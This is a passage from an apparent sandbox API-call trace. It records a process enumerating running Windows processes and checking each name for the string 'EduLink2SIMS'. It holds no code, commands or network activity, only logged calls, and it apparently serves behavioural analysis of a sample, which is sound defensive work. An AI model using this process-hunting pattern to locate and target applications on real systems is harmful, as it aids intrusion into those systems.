lpMultiByteStr=0x356e508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0100.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0100.830] StrStrIA (lpFirst="winlogon.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.830] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.831] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e3e8 [0100.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356e3e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0100.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0100.831] StrStrIA (lpFirst="services.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.831] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.832] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e400 [0100.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356e400, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0100.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0100.832] StrStrIA (lpFirst="lsass.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.832] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.833] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e580 [0100.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.833] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.833] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.833] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.834] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356e568 [0100.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356e568, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.835] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.835] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.835] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0100.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.836] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356e5e0 [0100.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356e5e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0100.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0100.836] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.836] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.837] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e5f8 [0100.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e5f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.837] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.837] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.838] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e128 [0100.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e128, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0100.838] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0100.838] StrStrIA (lpFirst="dwm.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.875] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.876] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e448 [0100.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e448, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.876] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.876] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.876] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.877] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e820 [0100.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e820, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.877] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.877] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.877] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.878] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e940 [0100.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.878] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.879] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.879] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.880] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e6e8 [0100.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e6e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.880] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.880] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.880] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.881] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e760 [0100.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e760, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.881] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.881] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.881] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.882] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e838 [0100.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.882] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.882] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.882] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.883] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e868 [0100.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.883] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.884] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.884] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.885] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e850 [0100.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.885] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.885] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.885] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.895] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e778 [0100.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.895] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.896] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.896] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.897] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e7d8 [0100.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e7d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.897] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.897] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.897] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.898] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e700 [0100.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x356e700, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0100.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0100.899] StrStrIA (lpFirst="spoolsv.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.899] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.900] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e7a8 [0100.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.900] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.900] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.900] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.901] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e790 [0100.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356e790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0100.901] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0100.901] StrStrIA (lpFirst="audiodg.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.902] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0100.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.903] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e8e0 [0100.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356e8e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0100.903] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0100.903] StrStrIA (lpFirst="sihost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.903] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.904] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e7c0 [0100.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356e7c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0100.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0100.905] StrStrIA (lpFirst="svchost.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.905] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0100.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.906] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e880 [0100.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356e880, cbMultiByte=14, lpDefaultChar=0x0, 